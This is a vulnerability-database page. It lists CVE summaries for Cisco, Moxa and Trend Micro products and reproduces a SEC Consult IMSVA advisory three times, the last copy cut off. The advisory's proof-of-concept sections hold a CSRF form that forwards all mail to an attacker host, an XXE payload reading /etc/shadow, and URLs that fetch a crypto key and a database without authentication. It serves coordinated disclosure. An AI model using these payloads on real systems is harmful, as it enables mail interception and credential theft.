VARIoT IoT vulnerabilities database

Multiple vulnerabilities in Cisco Webex Network Recording Player for Windows and Cisco Webex Player for Windows could allow an attacker to execute arbitrary code on an affected system. The vulnerabilities are due to insufficient validation of certain elements of a Webex recording that is stored in the Advanced Recording Format (ARF) or Webex Recording Format (WRF). An attacker could exploit these vulnerabilities by sending a user a malicious ARF or WRF file through a link or email attachment and persuading the user to open the file with the affected software on the local system. A successful exploit could allow the attacker to execute arbitrary code on the affected system with the privileges of the targeted user. The issue results from the lack of proper initialization of a pointer prior to accessing it

Multiple vulnerabilities in Cisco Webex Network Recording Player for Windows and Cisco Webex Player for Windows could allow an attacker to execute arbitrary code on an affected system. The vulnerabilities are due to insufficient validation of certain elements of a Webex recording that is stored in the Advanced Recording Format (ARF) or Webex Recording Format (WRF). An attacker could exploit these vulnerabilities by sending a user a malicious ARF or WRF file through a link or email attachment and persuading the user to open the file with the affected software on the local system. A successful exploit could allow the attacker to execute arbitrary code on the affected system with the privileges of the targeted user. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer

A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker with administrative credentials to conduct a cross-site scripting (XSS) attack against a user of the interface. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. To exploit this vulnerability, an attacker would need to have valid administrative credentials. The platform monitors the network by collecting real-time information on the network, users and devices, and formulating and implementing corresponding policies

A vulnerability in virtualization channel messaging in Cisco Webex Meetings Desktop App for Windows could allow a local attacker to execute arbitrary code on a targeted system. This vulnerability occurs when this app is deployed in a virtual desktop environment and using virtual environment optimization. This vulnerability is due to improper validation of messages processed by the Cisco Webex Meetings Desktop App. A local attacker with limited privileges could exploit this vulnerability by sending malicious messages to the affected software by using the virtualization channel interface. A successful exploit could allow the attacker to modify the underlying operating system configuration, which could allow the attacker to execute arbitrary code with the privileges of a targeted user. Note: This vulnerability can be exploited only when Cisco Webex Meetings Desktop App is in a virtual desktop environment on a hosted virtual desktop (HVD) and is configured to use the Cisco Webex Meetings virtual desktop plug-in for thin clients. Windows for Cisco Webex Meetings Desktop The application contains a path traversal vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state

An exploitable local privilege elevation vulnerability exists in the file system permissions of Moxa MXView series 3.1.8 installation. Depending on the vector chosen, an attacker can either add code to a script or replace a binary.By default MXViewService, which starts as a NT SYSTEM authority user executes a series of Node.Js scripts to start additional application functionality and among them the mosquitto executable is also run. Moxa MXView There is a permission management vulnerability in the series.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Moxa MXView is a software dedicated to network management developed by Moxa Corporation in Taiwan, China. This software can be used to configure and process all devices in the network

An exploitable local privilege elevation vulnerability exists in the file system permissions of Moxa MXView series 3.1.8 installation. Depending on the vector chosen, an attacker can either add code to a script or replace a binary. By default MXViewService, which starts as a NT SYSTEM authority user executes a series of Node.Js scripts to start additional application functionality. Moxa MXView There is a permission management vulnerability in the series.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Moxa MXView is a software dedicated to network management developed by Moxa Corporation in Taiwan, China. This software can be used to configure and process all devices in the network

A vulnerability in Cisco SD-WAN Software could allow an authenticated, local attacker to elevate privileges to root group on the underlying operating system. The vulnerability is due to incorrect permissions being set when the affected command is executed. An attacker could exploit this vulnerability by executing the affected command on an affected system. A successful exploit could allow the attacker to gain root privileges. Cisco SD-WAN The software contains a vulnerability in privilege management.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco SD-WAN vEdge is a router from Cisco of the United States. This device can provide basic WAN, security and multi-cloud functions for Cisco SD-WAN solutions. An access control error vulnerability exists in Cisco SD-WAN. The vulnerability stems from the network system or product improperly restricting access to resources from unauthorized roles. Attackers can use Cisco SD-WAN vEdge commands to bypass restrictions to elevate their privileges

A vulnerability in Cisco SD-WAN Software could allow an authenticated, local attacker to elevate privileges to root on the underlying operating system. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending a crafted request to a utility that is running on an affected system. A successful exploit could allow the attacker to gain root privileges. Cisco SD-WAN The software contains a vulnerability in privilege management.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco SD-WAN vManage is a software provided by Cisco in the United States that provides software-defined network functions. This software is a way of network virtualization. Cisco SD-WAN vEdge is a router from Cisco of the United States. This device can provide basic WAN, security and multi-cloud functions for Cisco SD-WAN solutions. Cisco SD-WAN Software has a privilege escalation vulnerability. The vulnerability stems from improper permission settings when the program executes the affected command

A vulnerability in the REST API of Cisco Edge Fog Fabric could allow an authenticated, remote attacker to access files outside of their authorization sphere on an affected device. The vulnerability is due to incorrect authorization enforcement on an affected system. An attacker could exploit this vulnerability by sending a crafted request to the API. A successful exploit could allow the attacker to overwrite arbitrary files on the affected device. Cisco Edge Fog Fabric Is vulnerable to a resource leak to the wrong area.Information may be tampered with. The platform provides new IoT applications for advanced monitoring and diagnostics, enabling real-time quality inspection, proactive maintenance and operating smart use cases. This vulnerability is successfully exploited

Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 is vulnerable to an information disclosure vulnerability which could allow an attacker to access a specific database and key. Unauthorized attackers can use vulnerabilities to obtain sensitive information about affected components. Ettlinger (Office Vienna) T. Serafin (Office Munich) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Trend Micro™ InterScan™ Messaging Security provides the most comprehensive protection against both traditional and targeted attacks. Using the correlated intelligence from Trend Micro™ Smart Protection Network™ and optional sandbox execution analysis, it blocks spam, phishing, and advanced persistent threats (APTs)." URL: https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/interscan-messaging.html Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. SEC Consult highly recommends to perform a thorough security review of this and similar Trend Micro products conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Cross-Site Request Forgery (CSRF CVE-2020-27016 (7.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H) A web service accessible to authenticated administrators allows modifying the appliance's policy configuration. This web service can also be accessed by leveraging a CSRF scenario. An attacker could therefore modify policy rules (e.g. bypass malware checks or forward all mails to another host) by tricking an authenticated administrator into accessing an attacker-controlled web page. 2) XML External Entity Processing (XXE) CVE-2020-27017 (7.6 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L) The web service from vulnerability #1 accepts requests in the form of XML documents. The XML parser used is not configured correctly, thus allowing an authenticated administrator to read arbitrary local files through XXE. Through an OOB XXE attack an attacker can exfiltrate local files through CSRF (see #1). 3) Over-privileged Users/Services Sudo is configured to allow several system users access to the root account. An attacker gaining control over one of these accounts can access the system as root. Moreover, several services are executed with the privileges of the user root. Therefore, finding #2 allows an attacker to read files only accessible to root (e.g. /etc/shadow). 4) Server Side Request Forgery (SSRF) & Local File Disclosure CVE-2020-27018 (2.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N/E:U/RL:X/RC:X) A script accessible through the appliance's web server can be abused to request any URL (e.g. http(s), file). An authenticated attacker can e.g. access any http(s) resources or parts of some local files. 5) Information Disclosure CVE-2020-27019 (4.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X) An SQLite database as well as a cryptographic key located in the webroot can be accessed without authentication. Note: It is unclear what the key is used for and whether the SQLite database could contain sensitive information in specific configurations. 6) Insufficient Password Storage CVE-2020-27693 (3.1 CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:L/E:U/RL:X/RC:X) The appliance stores passwords of administrative users as unsalted MD5 hashes which can be cracked easily. 7) Outdated Software CVE-2020-27694 (4.6 CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X) Several software components installed on the appliance are outdated. Moreover, the software updates provided by Trend Micro do not update the packages of the CentOS base system. SEC Consult did not verify whether the vulnerabilities identified through the version information are present or whether the vulnerabilities have an impact on the security of the system. Proof of concept: ----------------- 1) Cross-Site Request Forgery (CSRF) (CVE-2020-27016) The following request will create a rule that forwards all mails to an attacker: --- snip --- POST /ws_policies.imss HTTP/1.1 Host: [...] Cookie: JSESSIONID=[...]; Content-Length: 374 <policies> <policy name="forward all traffic to attacker" note="forward all traffic to attacker" enable="yes" version="1" order="1" type="other"> <route direction="incoming"> <from anyone="yes"></from> <to anyone="yes"></to> </route> <actions> <hand_off>attacker:25</hand_off> </actions> </policy> </policies> --- snip --- The following HTML fragment shows how this request can be sent in a CSRF scenario: --- snip --- <form action="https://[...]:8445/ws_policies.imss" method="POST" enctype="text/plain"> <input type="hidden" name='<policies><policy name' value='"forward all traffic to attacker" note="forward all traffic to attacker" enable="yes" version="1" order="1" type="other"> <route direction="incoming"><from anyone="yes"></from> <to anyone="yes"></to></route> <actions><hand_off>attacker:25</hand_off></actions> </policy></policies>' /> <input type="submit" value="Submit request" /> </form> --- snip --- 2) XML External Entity Processing (XXE) (CVE-2020-27017) The following request demonstrates the retrieval of /etc/shadow --- snip --- POST /ws_policies.imss HTTP/1.1 Host: [...]:8445 Cookie: JSESSIONID=[...]; Content-Length: 290 <!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/shadow" >]> <policies> <policy name="test" note="test" enable="yes" version="1" order="2" type="virus"> <route direction="incoming"> <from anyone="no"> <group>&xxe;</group> </from> </route> </policy> </policies> --- snip --- 3) Over-privileged Users/Services The local users "admin", "enable" and all users in the group "cliusers" can execute commands as root (no password entry required). Note that at least for the users "admin" and "enable" a restricted shell is configured, thus shell access is not easily possible. Several network services (e.g. Tomcat, OpenLDAP, imssmgr) are executed as root. Trend Micro supplied the following additional information: (a) If an IMSVA user created clish users, they can only run limited commands (IMSVA pre-defined commands) and all of these are one time commands (not a running service in the backend) (b) Most of these clish commands only read logs, and does not accept any arguments, so it cannot terminate or inject commands. (c) Few commands (such as ping) only accept few arguments (such as IP), but these are well-checked. Users cannot input any arguments with other meaning, so it cannot terminate or inject commands. Trend Micro decided not to include vulnerability #3 in the hardening/patch of the product as admin and enabled accounts are as important as root and changing the architecture would cause some functions not to work as expected. 4) Server Side Request Forgery (SSRF) & Local File Disclosure (CVE-2020-27018) The URL demonstrates the retrieval of an HTTP URL through the appliance: https://<host>:8445/widget/proxy_controller.php?module=modSimple&userGenerated=1&serverid=1&url=http://test When accessing file:// URLs, the application sends only the content that follows a sequence \r\n\r\n. Therefore only parts of certain files can be retrieved. 5) Information Disclosure (CVE-2020-27019) The following URL demonstrates the unauthenticated retrieval of a cryptographic key: https://<host>:8445/widget/repository/inc/class/common/crypt/crypt.key Moreover, an SQLite database can be retrieved. https://<host>:8445/widget/repository/db/sqlite/tmwf.db The contents of these files have not been further investigated. 6) Insufficient Password Storage (CVE-2020-27693) The passwords for local administrators are stored in a Postgres database (table tb_administrator, column md5_digest). The hashes are stored as unsalted MD5 digests which can be cracked easily. 7) Outdated Software (CVE-2020-27694) The following software versions are present in an appliance with patch level 1993: * PHP 5.6.38 (PHP 5.6 is EOL) * Apache HTTPD 2.4.37 (see http://httpd.apache.org/security/vulnerabilities_24.html) * Apache Tomcat 9.0.13 (see http://tomcat.apache.org/security-9.html) The appliance is built on top of a CentOS base system. The CentOS packages appear not to be updated with appliance updates. In a test system, the command "yum check-update" yielded 203 updates to installed packages. Vulnerable / tested versions: ----------------------------- Version 9.1.0.1960 Critical Patch 1993 has been tested and was found to be vulnerable. Previous versions are affected as well. Vendor contact timeline: ------------------------ 2020-04-28: Contacting vendor through security@trendmicro.com Submitting advisory information encrypted (PGP). 2020-04-28: Vendor reply, they will take a look at the issue. 2020-05-06: Vendor states that vulnerability resolution is in progress; Vendor has questions regarding two vulnerabilities 2020-05-07: Clarifying vulnerabilities 2020-05-25: Asking for status update 2020-05-25: Vendor: Vulnerability resolution is still in progress, details follow 2020-05-27: Vendor: A fix for 4 vulnerabilities is expected for the end of June 2020-06-29: Asking for status update 2020-07-01: Vendor provides prerelease update that addresses #1, #2, #4, #5, #6 2020-07-07: Sending results of short recheck #1 CSRF - fixed #2 XXE - fixed #4 SSRF/LFD - fixed #5 InfoDisc - fixed #6 Password Storage - not properly fixed yet 2020-07-08: Vendor confirms receipt; has question regarding #3 2020-07-10: Clarifying questions 2020-08-04: Asking for a status update 2020-08-04: Vendor: Issue #3 is under investigation, issue #7 in progress. 2020-08-22: Vendor provides information that all issues have been fixed except issue #3 as hardening it further would potentially break some features. 2020-08-24: Further advisory release coordination (date, CVE numbers, patch version) 2020-09-18: Asking for a status update; Answer: "The hotfix is ready, however, the official critical patch to be used for public disclosure is still being finalized"; disclosure date will be communicated later 2020-10-23: Patch is already public since 2020-10-09, but no security bulletin yet which will be coordinated 2020-11-04: Coordinated release of security advisory Solution: --------- The vendor provides a patch (9.1 Patch 3 - Critical Patch - Build 2025) which should be installed immediately. The release notes can be found here: https://files.trendmicro.com/documentation/readme/imsva_91_en_criticalpatch_b2025_EN_Readme.txt Patch download: https://downloadcenter.trendmicro.com/index.php?regs=nabu&prodid=91 https://files.trendmicro.com/products/imsva/9.1/imsva_91_en_criticalpatch_b2025.tar.gz Trend Micro Security Bulletin: https://success.trendmicro.com/solution/000279833 Workaround: ----------- No workaround available. Advisory URL: ------------- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF W. Ettlinger / @2020

Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 has updated a specific critical library that may vulnerable to attack. No detailed vulnerability details are currently provided. Ettlinger (Office Vienna) T. Serafin (Office Munich) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Trend Micro™ InterScan™ Messaging Security provides the most comprehensive protection against both traditional and targeted attacks. Using the correlated intelligence from Trend Micro™ Smart Protection Network™ and optional sandbox execution analysis, it blocks spam, phishing, and advanced persistent threats (APTs)." URL: https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/interscan-messaging.html Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. SEC Consult highly recommends to perform a thorough security review of this and similar Trend Micro products conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Cross-Site Request Forgery (CSRF CVE-2020-27016 (7.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H) A web service accessible to authenticated administrators allows modifying the appliance's policy configuration. This web service can also be accessed by leveraging a CSRF scenario. An attacker could therefore modify policy rules (e.g. bypass malware checks or forward all mails to another host) by tricking an authenticated administrator into accessing an attacker-controlled web page. 2) XML External Entity Processing (XXE) CVE-2020-27017 (7.6 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L) The web service from vulnerability #1 accepts requests in the form of XML documents. The XML parser used is not configured correctly, thus allowing an authenticated administrator to read arbitrary local files through XXE. Through an OOB XXE attack an attacker can exfiltrate local files through CSRF (see #1). 3) Over-privileged Users/Services Sudo is configured to allow several system users access to the root account. An attacker gaining control over one of these accounts can access the system as root. Moreover, several services are executed with the privileges of the user root. Therefore, finding #2 allows an attacker to read files only accessible to root (e.g. /etc/shadow). 4) Server Side Request Forgery (SSRF) & Local File Disclosure CVE-2020-27018 (2.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N/E:U/RL:X/RC:X) A script accessible through the appliance's web server can be abused to request any URL (e.g. http(s), file). An authenticated attacker can e.g. access any http(s) resources or parts of some local files. 5) Information Disclosure CVE-2020-27019 (4.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X) An SQLite database as well as a cryptographic key located in the webroot can be accessed without authentication. Note: It is unclear what the key is used for and whether the SQLite database could contain sensitive information in specific configurations. 6) Insufficient Password Storage CVE-2020-27693 (3.1 CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:L/E:U/RL:X/RC:X) The appliance stores passwords of administrative users as unsalted MD5 hashes which can be cracked easily. 7) Outdated Software CVE-2020-27694 (4.6 CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X) Several software components installed on the appliance are outdated. Moreover, the software updates provided by Trend Micro do not update the packages of the CentOS base system. SEC Consult did not verify whether the vulnerabilities identified through the version information are present or whether the vulnerabilities have an impact on the security of the system. Proof of concept: ----------------- 1) Cross-Site Request Forgery (CSRF) (CVE-2020-27016) The following request will create a rule that forwards all mails to an attacker: --- snip --- POST /ws_policies.imss HTTP/1.1 Host: [...] Cookie: JSESSIONID=[...]; Content-Length: 374 <policies> <policy name="forward all traffic to attacker" note="forward all traffic to attacker" enable="yes" version="1" order="1" type="other"> <route direction="incoming"> <from anyone="yes"></from> <to anyone="yes"></to> </route> <actions> <hand_off>attacker:25</hand_off> </actions> </policy> </policies> --- snip --- The following HTML fragment shows how this request can be sent in a CSRF scenario: --- snip --- <form action="https://[...]:8445/ws_policies.imss" method="POST" enctype="text/plain"> <input type="hidden" name='<policies><policy name' value='"forward all traffic to attacker" note="forward all traffic to attacker" enable="yes" version="1" order="1" type="other"> <route direction="incoming"><from anyone="yes"></from> <to anyone="yes"></to></route> <actions><hand_off>attacker:25</hand_off></actions> </policy></policies>' /> <input type="submit" value="Submit request" /> </form> --- snip --- 2) XML External Entity Processing (XXE) (CVE-2020-27017) The following request demonstrates the retrieval of /etc/shadow --- snip --- POST /ws_policies.imss HTTP/1.1 Host: [...]:8445 Cookie: JSESSIONID=[...]; Content-Length: 290 <!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/shadow" >]> <policies> <policy name="test" note="test" enable="yes" version="1" order="2" type="virus"> <route direction="incoming"> <from anyone="no"> <group>&xxe;</group> </from> </route> </policy> </policies> --- snip --- 3) Over-privileged Users/Services The local users "admin", "enable" and all users in the group "cliusers" can execute commands as root (no password entry required). Note that at least for the users "admin" and "enable" a restricted shell is configured, thus shell access is not easily possible. Several network services (e.g. Tomcat, OpenLDAP, imssmgr) are executed as root. Trend Micro supplied the following additional information: (a) If an IMSVA user created clish users, they can only run limited commands (IMSVA pre-defined commands) and all of these are one time commands (not a running service in the backend) (b) Most of these clish commands only read logs, and does not accept any arguments, so it cannot terminate or inject commands. (c) Few commands (such as ping) only accept few arguments (such as IP), but these are well-checked. Users cannot input any arguments with other meaning, so it cannot terminate or inject commands. Trend Micro decided not to include vulnerability #3 in the hardening/patch of the product as admin and enabled accounts are as important as root and changing the architecture would cause some functions not to work as expected. 4) Server Side Request Forgery (SSRF) & Local File Disclosure (CVE-2020-27018) The URL demonstrates the retrieval of an HTTP URL through the appliance: https://<host>:8445/widget/proxy_controller.php?module=modSimple&userGenerated=1&serverid=1&url=http://test When accessing file:// URLs, the application sends only the content that follows a sequence \r\n\r\n. Therefore only parts of certain files can be retrieved. 5) Information Disclosure (CVE-2020-27019) The following URL demonstrates the unauthenticated retrieval of a cryptographic key: https://<host>:8445/widget/repository/inc/class/common/crypt/crypt.key Moreover, an SQLite database can be retrieved. https://<host>:8445/widget/repository/db/sqlite/tmwf.db The contents of these files have not been further investigated. 6) Insufficient Password Storage (CVE-2020-27693) The passwords for local administrators are stored in a Postgres database (table tb_administrator, column md5_digest). The hashes are stored as unsalted MD5 digests which can be cracked easily. 7) Outdated Software (CVE-2020-27694) The following software versions are present in an appliance with patch level 1993: * PHP 5.6.38 (PHP 5.6 is EOL) * Apache HTTPD 2.4.37 (see http://httpd.apache.org/security/vulnerabilities_24.html) * Apache Tomcat 9.0.13 (see http://tomcat.apache.org/security-9.html) The appliance is built on top of a CentOS base system. The CentOS packages appear not to be updated with appliance updates. In a test system, the command "yum check-update" yielded 203 updates to installed packages. Vulnerable / tested versions: ----------------------------- Version 9.1.0.1960 Critical Patch 1993 has been tested and was found to be vulnerable. Previous versions are affected as well. Vendor contact timeline: ------------------------ 2020-04-28: Contacting vendor through security@trendmicro.com Submitting advisory information encrypted (PGP). 2020-04-28: Vendor reply, they will take a look at the issue. 2020-05-06: Vendor states that vulnerability resolution is in progress; Vendor has questions regarding two vulnerabilities 2020-05-07: Clarifying vulnerabilities 2020-05-25: Asking for status update 2020-05-25: Vendor: Vulnerability resolution is still in progress, details follow 2020-05-27: Vendor: A fix for 4 vulnerabilities is expected for the end of June 2020-06-29: Asking for status update 2020-07-01: Vendor provides prerelease update that addresses #1, #2, #4, #5, #6 2020-07-07: Sending results of short recheck #1 CSRF - fixed #2 XXE - fixed #4 SSRF/LFD - fixed #5 InfoDisc - fixed #6 Password Storage - not properly fixed yet 2020-07-08: Vendor confirms receipt; has question regarding #3 2020-07-10: Clarifying questions 2020-08-04: Asking for a status update 2020-08-04: Vendor: Issue #3 is under investigation, issue #7 in progress. 2020-08-22: Vendor provides information that all issues have been fixed except issue #3 as hardening it further would potentially break some features. 2020-08-24: Further advisory release coordination (date, CVE numbers, patch version) 2020-09-18: Asking for a status update; Answer: "The hotfix is ready, however, the official critical patch to be used for public disclosure is still being finalized"; disclosure date will be communicated later 2020-10-23: Patch is already public since 2020-10-09, but no security bulletin yet which will be coordinated 2020-11-04: Coordinated release of security advisory Solution: --------- The vendor provides a patch (9.1 Patch 3 - Critical Patch - Build 2025) which should be installed immediately. The release notes can be found here: https://files.trendmicro.com/documentation/readme/imsva_91_en_criticalpatch_b2025_EN_Readme.txt Patch download: https://downloadcenter.trendmicro.com/index.php?regs=nabu&prodid=91 https://files.trendmicro.com/products/imsva/9.1/imsva_91_en_criticalpatch_b2025.tar.gz Trend Micro Security Bulletin: https://success.trendmicro.com/solution/000279833 Workaround: ----------- No workaround available. Advisory URL: ------------- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF W. Ettlinger / @2020

Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 stores administrative passwords using a hash that is considered outdated. No detailed vulnerability details are currently provided. SEC Consult Vulnerability Lab Security Advisory < 20201104-0 > ======================================================================= title: Multiple Vulnerabilities product: Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) vulnerable version: < 9.1.0 Critical Patch Build 2025 fixed version: 9.1.0 Critical Patch - Build 2025 CVE number: CVE-2020-27016, CVE-2020-27017, CVE-2020-27018, CVE-2020-27019 CVE-2020-27693, CVE-2020-27694 impact: High homepage: https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/interscan-messaging.html found: 2020-04 by: W. Ettlinger (Office Vienna) T. Serafin (Office Munich) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Trend Micro™ InterScan™ Messaging Security provides the most comprehensive protection against both traditional and targeted attacks. Using the correlated intelligence from Trend Micro™ Smart Protection Network™ and optional sandbox execution analysis, it blocks spam, phishing, and advanced persistent threats (APTs)." URL: https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/interscan-messaging.html Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. SEC Consult highly recommends to perform a thorough security review of this and similar Trend Micro products conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Cross-Site Request Forgery (CSRF CVE-2020-27016 (7.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H) A web service accessible to authenticated administrators allows modifying the appliance's policy configuration. This web service can also be accessed by leveraging a CSRF scenario. An attacker could therefore modify policy rules (e.g. bypass malware checks or forward all mails to another host) by tricking an authenticated administrator into accessing an attacker-controlled web page. 2) XML External Entity Processing (XXE) CVE-2020-27017 (7.6 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L) The web service from vulnerability #1 accepts requests in the form of XML documents. The XML parser used is not configured correctly, thus allowing an authenticated administrator to read arbitrary local files through XXE. Through an OOB XXE attack an attacker can exfiltrate local files through CSRF (see #1). 3) Over-privileged Users/Services Sudo is configured to allow several system users access to the root account. An attacker gaining control over one of these accounts can access the system as root. Moreover, several services are executed with the privileges of the user root. Therefore, finding #2 allows an attacker to read files only accessible to root (e.g. /etc/shadow). 4) Server Side Request Forgery (SSRF) & Local File Disclosure CVE-2020-27018 (2.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N/E:U/RL:X/RC:X) A script accessible through the appliance's web server can be abused to request any URL (e.g. http(s), file). An authenticated attacker can e.g. access any http(s) resources or parts of some local files. 5) Information Disclosure CVE-2020-27019 (4.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X) An SQLite database as well as a cryptographic key located in the webroot can be accessed without authentication. Note: It is unclear what the key is used for and whether the SQLite database could contain sensitive information in specific configurations. 7) Outdated Software CVE-2020-27694 (4.6 CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X) Several software components installed on the appliance are outdated. Moreover, the software updates provided by Trend Micro do not update the packages of the CentOS base system. SEC Consult did not verify whether the vulnerabilities identified through the version information are present or whether the vulnerabilities have an impact on the security of the system. Proof of concept: ----------------- 1) Cross-Site Request Forgery (CSRF) (CVE-2020-27016) The following request will create a rule that forwards all mails to an attacker: --- snip --- POST /ws_policies.imss HTTP/1.1 Host: [...] Cookie: JSESSIONID=[...]; Content-Length: 374 <policies> <policy name="forward all traffic to attacker" note="forward all traffic to attacker" enable="yes" version="1" order="1" type="other"> <route direction="incoming"> <from anyone="yes"></from> <to anyone="yes"></to> </route> <actions> <hand_off>attacker:25</hand_off> </actions> </policy> </policies> --- snip --- The following HTML fragment shows how this request can be sent in a CSRF scenario: --- snip --- <form action="https://[...]:8445/ws_policies.imss" method="POST" enctype="text/plain"> <input type="hidden" name='<policies><policy name' value='"forward all traffic to attacker" note="forward all traffic to attacker" enable="yes" version="1" order="1" type="other"> <route direction="incoming"><from anyone="yes"></from> <to anyone="yes"></to></route> <actions><hand_off>attacker:25</hand_off></actions> </policy></policies>' /> <input type="submit" value="Submit request" /> </form> --- snip --- 2) XML External Entity Processing (XXE) (CVE-2020-27017) The following request demonstrates the retrieval of /etc/shadow --- snip --- POST /ws_policies.imss HTTP/1.1 Host: [...]:8445 Cookie: JSESSIONID=[...]; Content-Length: 290 <!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/shadow" >]> <policies> <policy name="test" note="test" enable="yes" version="1" order="2" type="virus"> <route direction="incoming"> <from anyone="no"> <group>&xxe;</group> </from> </route> </policy> </policies> --- snip --- 3) Over-privileged Users/Services The local users "admin", "enable" and all users in the group "cliusers" can execute commands as root (no password entry required). Note that at least for the users "admin" and "enable" a restricted shell is configured, thus shell access is not easily possible. Several network services (e.g. Tomcat, OpenLDAP, imssmgr) are executed as root. Trend Micro supplied the following additional information: (a) If an IMSVA user created clish users, they can only run limited commands (IMSVA pre-defined commands) and all of these are one time commands (not a running service in the backend) (b) Most of these clish commands only read logs, and does not accept any arguments, so it cannot terminate or inject commands. (c) Few commands (such as ping) only accept few arguments (such as IP), but these are well-checked. Users cannot input any arguments with other meaning, so it cannot terminate or inject commands. Trend Micro decided not to include vulnerability 